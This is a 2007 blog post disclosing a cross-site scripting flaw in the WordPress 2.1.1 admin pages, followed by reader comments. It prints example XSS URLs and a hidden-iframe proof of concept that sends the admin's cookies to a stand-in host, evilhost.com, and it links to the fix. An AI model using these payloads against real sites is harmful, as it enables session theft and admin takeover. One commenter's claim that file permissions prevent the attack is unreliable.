Zeroday Exploit found for WordPress 2.1.1
Published by Sunny on February 28th, 2007 in WordPressA vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.
Here are some examples of arbitrary code execution:
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Here is a proof-of-concept code to steal the admin cookies:
<iframe width="0" height="0" src="http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27″></iframe>
Solution:
http://trac.wordpress.org/changeset/4951
http://trac.wordpress.org/changeset/4952
comments
trackback
February 28th, 2007 at 9:44 pm
Is this only for self hosted sites? or does it apply to wordpress hosted sites also?
March 1st, 2007 at 10:45 am
It sure didn’t work on your blog
March 1st, 2007 at 3:01 pm
and did it work on..say…preshit’s blog?
March 1st, 2007 at 3:17 pm
Nope. Preshit’s blogs are hosted on the same server as my sites. And by default, the permissions seem to disallow unauthorized access to files. We’re safe!
March 1st, 2007 at 4:29 pm
*phew*
March 1st, 2007 at 5:48 pm
I’m safe
March 1st, 2007 at 6:29 pm
Am i safe???? I think so….
http://gotechno.org/
April 13th, 2007 at 12:45 am
hi nice site.